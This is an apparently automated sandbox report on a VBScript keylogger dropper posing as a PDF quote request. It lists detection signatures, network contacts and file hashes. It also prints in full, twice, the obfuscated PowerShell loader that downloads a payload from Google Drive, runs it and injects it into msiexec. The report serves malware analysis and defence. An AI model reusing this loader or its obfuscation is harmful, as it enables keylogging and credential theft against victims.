Analysis Overview
SHA256
ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286
Threat Level: Known bad
The file RFQ_64182MR_PDF.R00.vbs was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Program crash
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-24 06:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-24 06:41
Reported
2024-10-24 07:40
Platform
win7-20240903-en
Max time kernel
35s
Max time network
126s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_64182MR_PDF.R00.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. 
nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios 
.tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN 
rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu 
pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. 
nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios 
.tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN 
rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu 
pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 193.122.130.0:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.80:80 | crl.microsoft.com | tcp |
Files
memory/2896-4-0x000007FEF513E000-0x000007FEF513F000-memory.dmp
memory/2896-5-0x000000001B700000-0x000000001B9E2000-memory.dmp
memory/2896-6-0x0000000001E60000-0x0000000001E68000-memory.dmp
memory/2896-7-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-9-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
memory/2896-14-0x000007FEF513E000-0x000007FEF513F000-memory.dmp
memory/2896-16-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZEWQANB74JC5JAIXK3PO.temp
| MD5 | d0a1b6f8c101524394750e499ab57ab4 |
| SHA1 | d76539a75d684d909358551bc0166f9fd0dc8e4a |
| SHA256 | e8b790bea3d144883ec5b0fdf38a397e81a303fca748a97c6a776c0525210a4c |
| SHA512 | 8c2f3e896d6f423cfb102fe985b2eeaf2986f67a52830b59ac7f73414acb20b2e16e122ca306f9956af8d597cf5e6e6ad229c43d346e3dd781cb9138ae2dc78c |
C:\Users\Admin\AppData\Roaming\Platyhelminthic195.End
| MD5 | 6771cd798c1df9b5eddc60071dfc6e15 |
| SHA1 | 65e923600e1c2604d90a481d257dc99c23fbf1dd |
| SHA256 | 0849655061e0ce5f5f2633e43ef08a62a3482cf9f15baf24fbd6b25f8abad95f |
| SHA512 | cf0013a56ef6ab5fb48ddd80d3e94b879b6890586a5e11313c66b35c352111d3fff2d21a9f9e42a4163cf4e05419610a696e5d428a32eacb45d6f4103b9085ee |
memory/2144-20-0x0000000006780000-0x000000000B708000-memory.dmp
memory/2200-42-0x0000000000740000-0x00000000017A2000-memory.dmp
memory/2200-43-0x0000000000740000-0x00000000017A2000-memory.dmp
memory/2200-44-0x0000000000740000-0x0000000000788000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-24 06:41
Reported
2024-10-24 08:19
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\msiexec.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1720 wrote to memory of 2516 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1720 wrote to memory of 2516 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4948 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
